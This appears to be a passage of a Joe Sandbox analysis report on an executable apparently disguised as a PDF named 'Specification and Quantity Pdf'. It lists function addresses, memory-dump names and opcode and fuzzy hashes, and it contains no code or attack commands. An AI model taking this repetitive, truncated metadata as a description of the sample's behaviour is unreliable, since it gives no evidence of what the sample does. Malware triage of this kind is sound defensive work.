Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CounterPerformanceQuery
String ID:
API String ID: 2783962273-3916222277
Opcode ID: 0f497518f3011c90386f56ae0dd19987edc3a4fef3325d72aee3a22fc2e24883
Instruction ID: c35842e7f484654b3ac334df4528a6549c752559b4e390cd7d762a1eb587cc3a
Opcode Fuzzy Hash: 0f497518f3011c90386f56ae0dd19987edc3a4fef3325d72aee3a22fc2e24883
Instruction Fuzzy Hash: A6D1C373A38A9682EA90AB65E440279B395FB41BA4F944332DE6D677D0DF3CE051C320

Function 00007FF773CE9080 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF773CE90F0

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 631e051c7e85c708eee405e58e5ac8c33c0e023327227dff62814852cabaa958
Instruction ID: cbc1feffcd044cd58f4aaa998579ddecdb09d640e1e9336f4bbbfe78b7dbfb68
Opcode Fuzzy Hash: 631e051c7e85c708eee405e58e5ac8c33c0e023327227dff62814852cabaa958
Instruction Fuzzy Hash: AC012A33F246609DF761EBA5EC40AED77B5BB48358FA0412ADE0CA6A49DF349496C700

Function 00007FF773C680D0 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

%_, xrefs: 00007FF773C68228

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID: %_
API String ID: 0-4145416222
Opcode ID: 28531a6797bb50e98dfc9a6ae1b5f79929bc6386de9e3fae4bdb5bd213b841f6
Instruction ID: ac25eb94a0ba39906624a36420b85d32b0d285fe17edf03c3c3b455010eb03c0
Opcode Fuzzy Hash: 28531a6797bb50e98dfc9a6ae1b5f79929bc6386de9e3fae4bdb5bd213b841f6
Instruction Fuzzy Hash: B941F763F3CB0AC1ED85A7B6AA41634E1525F5A7D0EA8C732D85E377D1EF2D71904220

Function 00007FF773C59430 Relevance: 1.0, Instructions: 971COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fa54e4b404b83b64a3ef684d3fa7d9e7b579a293c5d3786dac23140140fd01d
Instruction ID: 8ea7643807d3e8fa193684662e4e35cab19610ab380040e7973cd9a3852250b3
Opcode Fuzzy Hash: 3fa54e4b404b83b64a3ef684d3fa7d9e7b579a293c5d3786dac23140140fd01d
Instruction Fuzzy Hash: 6282EFB3B2878587EBA49B15E1402B9B7A1FB94780F648136DB4E53B84DF3DE960C740

Function 00007FF773C84390 Relevance: 1.0, Instructions: 955COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c44773253abac8336c1d72ee043a06f130369fffe4656ea49cf70b632554c591
Instruction ID: d6efedd3c51aaabbf9bdcaddcd34d8c0fa9af55bdf03cf0d49a4047f7ad933a7
Opcode Fuzzy Hash: c44773253abac8336c1d72ee043a06f130369fffe4656ea49cf70b632554c591
Instruction Fuzzy Hash: 1B92F063E3CB5285EA81ABA5A8506B4F395BF45BC4FC48236D90E777A0DF3DE1518320

Function 00007FF773C892CE Relevance: .8, Instructions: 844COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1e24ba0ba6bef78217b93cc1824f39f4ffccc09ca148982d560d43c4ab6c4d9
Instruction ID: 564a92b90865708bdb77994d74d6e82f55c747812fcc81412014e864e42ef45b
Opcode Fuzzy Hash: f1e24ba0ba6bef78217b93cc1824f39f4ffccc09ca148982d560d43c4ab6c4d9
Instruction Fuzzy Hash: 4782BB63A3CA4285EBD0AB65A4402B9B3A5FF45788F944236C94E233E0DF3DE565C360

Function 00007FF773C888D9 Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f905b1f908e65b5aba95cf85111788d4451240a2511b24a2e32d8eb1b4069d57
Instruction ID: a73cd6657c20e3690908087baab83148077c25062d9e54672bcb33d29b778eda
Opcode Fuzzy Hash: f905b1f908e65b5aba95cf85111788d4451240a2511b24a2e32d8eb1b4069d57
Instruction Fuzzy Hash: 8E82CA33B38B8186EB90AB65E8402B9B7A1FB44B98F944136DE4D63B94DF3CE551C710

Function 00007FF773C75200 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf5feb339442a0b79f58c974cad3d97fda4eb93d98ba6868e8e29d5f65b0f64f
Instruction ID: afe144e48cc4c426e1e5d31716f19da662e7381aab868070fc433f5184f99f1e
Opcode Fuzzy Hash: bf5feb339442a0b79f58c974cad3d97fda4eb93d98ba6868e8e29d5f65b0f64f
Instruction Fuzzy Hash: BB5250E3A39B9A81EEA59B19C044378A7A0FF15BA5F985235CF6C233D4DF6CD490C210

Function 00007FF773C852E0 Relevance: .6, Instructions: 619COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b492ad88cf215fc62258aba1709844d5f27e408f569c58da072858a9a9ad3981
Instruction ID: 60d7930f0e6ebc9a40d7533493f762fac02d880c36537819671e33b94b0656dd
Opcode Fuzzy Hash: b492ad88cf215fc62258aba1709844d5f27e408f569c58da072858a9a9ad3981
Instruction Fuzzy Hash: 7742BBB3B38B4686EB909B65E4401ADB7A1FB44B98F840532DF4E27B98CE7CE551C710

Function 00007FF773C85C20 Relevance: .6, Instructions: 604COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e52f450864030abe068b2e943946e6a8f68a43271c38fbddae6a16a12d04da61
Instruction ID: e8f7660bfc12e4b6c39d505f2ca2f38442ca1dbd8070888c792889e901caebe5
Opcode Fuzzy Hash: e52f450864030abe068b2e943946e6a8f68a43271c38fbddae6a16a12d04da61
Instruction Fuzzy Hash: C042AE73B3874586EB90DBA5D5002ECB3A2AB45B88F844536DE0D37B88CF38E565C364

Function 00007FF773C8BEA0 Relevance: .6, Instructions: 561COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 456757d216aacf14f41c1d1ac0cd8049a835610a21c3933073f91090c7e01898
Instruction ID: 5bccf5689972a5402d231c1d0c4e17dfdcb5b9ccec698b6b71f93462a7e17a9e
Opcode Fuzzy Hash: 456757d216aacf14f41c1d1ac0cd8049a835610a21c3933073f91090c7e01898
Instruction Fuzzy Hash: DD42B573B38B8982DA90EF49E4402A9B7A1FB41BD0F859136DA8D67798DF3CD155C310

Function 00007FF773C72D30 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58ab2ea6ff0a684350a52622f01339377179222e3f8cb1db98c70cb3a0ab0f85
Instruction ID: 470920c5859069642522859005785bd6ca53b8ea2e915d9663fb56f572f95bc8
Opcode Fuzzy Hash: 58ab2ea6ff0a684350a52622f01339377179222e3f8cb1db98c70cb3a0ab0f85
Instruction Fuzzy Hash: 1A221523A39FC945E687A7399411375E395AF563C1F988332ED4F327A1EF3EA1528210

Function 00007FF773D200E0 Relevance: .4, Instructions: 428COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e10a91a420f83ef269157d36f9a2c016ddaa9393997882352c17c1d84d133b48
Instruction ID: cc0ae2fd5fd2a2fadb1285e989a351e715797d3982c2c4e4043937db16d10ee4
Opcode Fuzzy Hash: e10a91a420f83ef269157d36f9a2c016ddaa9393997882352c17c1d84d133b48
Instruction Fuzzy Hash: 24029D73B28A558AEB50DF65D880AAC7770FB88B98F909132DE4D63B95CF34D981C740

Function 00007FF773C8B4F0 Relevance: .4, Instructions: 424COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CounterPerformanceQuery
String ID:
API String ID: 2783962273-0
Opcode ID: af019d92b74d7be67137a52f9c77fda3c993f8b49f31bc8590fea9e3453cb08d
Instruction ID: 4f0ae79af0b13b363ba2676b7750648b3fbe0baede83a19c1e64eb263c968b4b
Opcode Fuzzy Hash: af019d92b74d7be67137a52f9c77fda3c993f8b49f31bc8590fea9e3453cb08d
Instruction Fuzzy Hash: FA02E463B39A4686EA90AF55E4403F9B7A0EF45BA4F848236D92E673D4DF3CE151C310

Function 00007FF773C70360 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b68f8225f78dbd7e70b131091e98211d99f4f2d9e2b5582c38477461e06b5bdc
Instruction ID: a962ce0d36d9977708741bec42de20c8a780105f2652b6d6ce60c8f5fb4bbbde
Opcode Fuzzy Hash: b68f8225f78dbd7e70b131091e98211d99f4f2d9e2b5582c38477461e06b5bdc
Instruction Fuzzy Hash: 7302B073A38A5686FA94EF55D8406B8B760EB40BA5F848232DE6D673D0CF3CE451C321

Function 00007FF773C78200 Relevance: .4, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 755864b5fa2e0ffc51d8cb0fddda48fb3472de9c38ab859b6004a688e4e9f16c
Instruction ID: 0f1c5d9e96eaf577c2825e32eb321d0b579f14566c6f96928b34d46e2ef28a11
Opcode Fuzzy Hash: 755864b5fa2e0ffc51d8cb0fddda48fb3472de9c38ab859b6004a688e4e9f16c
Instruction Fuzzy Hash: 64F10B13E3975D41E992A67752023B5D6916F6A7C1E9CCB32EE4E367D0EF3CB0918220

Function 00007FF773C891B0 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 323b4a52389b31af78a198108c136ecd75e8293e50210e2468e6e8b2983b1f89
Instruction ID: e0590e9904bc09772f453c66573d7e944a9d1f6878f386f96923f1fcd3d1227a
Opcode Fuzzy Hash: 323b4a52389b31af78a198108c136ecd75e8293e50210e2468e6e8b2983b1f89
Instruction Fuzzy Hash: 26E10273A3864286EB91AB65D4486B9B3A1FF45B94F944232C91E637D0DF3CE591C320

Function 00007FF773C74CD9 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d78bf327fc7d401db98ee101711161cfb4b90b568116cb42030e1b04918fb35b
